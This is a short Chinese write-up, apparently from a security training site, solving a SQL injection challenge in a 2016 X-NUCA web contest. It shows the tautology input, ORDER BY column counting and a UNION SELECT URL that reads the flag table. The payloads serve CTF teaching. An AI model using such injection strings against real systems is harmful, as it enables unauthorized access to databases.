X-NUCA(牛咖)联赛7月web专题赛赛前--注入那么简单的解题思路 

X-NUCA(牛咖)联赛7月web专题赛赛前--注入那么简单的解题思路

发表于:2016-07-29 09:10:00 来源:  合天网安实验室 阅读数(0人)



题目要求是注入,可输入的参数为name


首先尝试name=guest 存在返回。


再次尝试name=guest’or’1’=’1,返回3列,说明没有做过多的过滤,这里,我们尝试用order by 来获得列。


Name=guest’order by 1 %23 有返回,依次递增数字到4时报错,说明有3列。


题目提示,说要猜表,构造如下语句,来获得flag


http://218.76.35.75:20101/?name=guest%27union%20select%201,flag,3%20from%20flag%23


相关新闻

大家都在学

课程详情

经典网安事件

课程详情

web防御中的代码安全

课程详情

Android_APP安全检测